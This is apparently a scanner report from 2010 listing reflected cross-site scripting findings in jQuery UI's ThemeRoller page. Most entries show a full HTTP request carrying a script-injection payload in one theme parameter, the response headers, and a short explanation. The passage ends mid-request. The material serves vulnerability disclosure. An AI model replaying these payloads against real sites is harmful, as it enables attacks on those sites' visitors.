GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F85b626"><script>alert(1)</script>9ec3e8ecc13&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6b8"><script>alert(1)</script>2191a8942ba was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF3b6b8"><script>alert(1)</script>2191a8942ba&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d054d"><script>alert(1)</script>a6d04b0004 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFFd054d"><script>alert(1)</script>a6d04b0004&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120319
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4088"><script>alert(1)</script>2de39e79b84 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFFd4088"><script>alert(1)</script>2de39e79b84&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f8a"><script>alert(1)</script>5c9db817cbc was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD92f8a"><script>alert(1)</script>5c9db817cbc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8955b"><script>alert(1)</script>3d3632ac57f was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C8955b"><script>alert(1)</script>3d3632ac57f&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6591f"><script>alert(1)</script>a2709f92cce was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF6591f"><script>alert(1)</script>a2709f92cce&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddc89"><script>alert(1)</script>3fd82bd44b8 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000ddc89"><script>alert(1)</script>3fd82bd44b8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a65e5"><script>alert(1)</script>00ab20f4a9f was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDDa65e5"><script>alert(1)</script>00ab20f4a9f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2f2d"><script>alert(1)</script>97f8aa11556 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100d2f2d"><script>alert(1)</script>97f8aa11556&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997f9"><script>alert(1)</script>4169bdc7a36 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100997f9"><script>alert(1)</script>4169bdc7a36&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f4cd"><script>alert(1)</script>021c587b46e was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=505f4cd"><script>alert(1)</script>021c587b46e&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55e29"><script>alert(1)</script>b8d95e5854a was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=10055e29"><script>alert(1)</script>b8d95e5854a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityO